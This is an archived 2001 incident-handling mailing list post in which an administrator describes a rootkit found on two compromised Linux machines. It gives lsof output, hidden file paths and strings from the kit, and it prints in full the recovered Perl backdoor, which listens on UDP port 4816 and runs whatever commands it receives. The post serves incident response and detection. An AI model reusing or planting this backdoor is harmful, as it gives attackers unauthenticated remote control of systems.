Security Incidents mailing list archives
New rootkit?
From: UIA Security <securityman () uia net>
Date: Wed, 12 Dec 2001 09:17:19 -0800
Hi folks,Had 2 comp'd boxes this morning running mandrake linux. Curiously, I can't find info on this rootkit anywhere. Anyone know it?
lsof -i: .r00tsnif 11863 root 1u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE) .r00tsnif 11863 root 2u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE) .r00tsnif 11863 root 4u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE) .r00tshoc 11865 root 0u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE) .r00tshoc 11865 root 2u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE) .r00tshoc 11865 root 3u IPv4 682409 UDP *:4816 .r00tshoc 11865 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE).r00tpass 11866 root 1u IPv4 682146 TCP x:ssh->209.158.182.186:3510 (CLOSE)
.r00tpass 11866 root 2u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00tpass 11866 root 3u IPv4 682407 TCP *:9658 (LISTEN) .r00tpass 11866 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00t 11869 root 3u IPv4 682413 TCP *:65535 (LISTEN) .r00t 11869 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00t 11872 root 3u IPv4 682418 TCP *:31221 (LISTEN) .r00t 11872 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00tspin 11874 root 0u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00tspin 11874 root 2u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) .r00tspin 11874 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE) new files: /usr/lib/.r00t /usr/lib/.r00t/.r00tshocky /usr/lib/.r00t/.r00tpasswd /usr/lib/.r00t/.r00t /usr/man/man2/.r00tm0e Some interesting strings: Welcome to shocker AnD VorTexTK You are now r00t. Have phun.. /usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP: #!/usr/bin/perl $pid=fork; exit if $pid; die("Error.") unless defined($pid); use IO::Socket; use POSIX; POSIX::setsid(); $time_to_die=0; sub signal_handler { $time_to_die=1; } $SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler; until($time_to_die) { $|=1; $port=4816; $maxlen=1024; my($sock, $raddr, $rhost);$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.Merge deja\n");
while($sock->recv($msg, $maxlen)) { print $msg; my($rport, $ipaddr)=sockaddr_in($sock->peername); $rhost=gethostbyaddr($ipaddr, AF_INET); $output=`$msg`; $sock->send($output); $sock->send("-end."); } } ...and of course a host of infected binaries. Any thoughts? --Liam ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New rootkit? UIA Security (Dec 12)
- Re: New rootkit? Blake Frantz (Dec 13)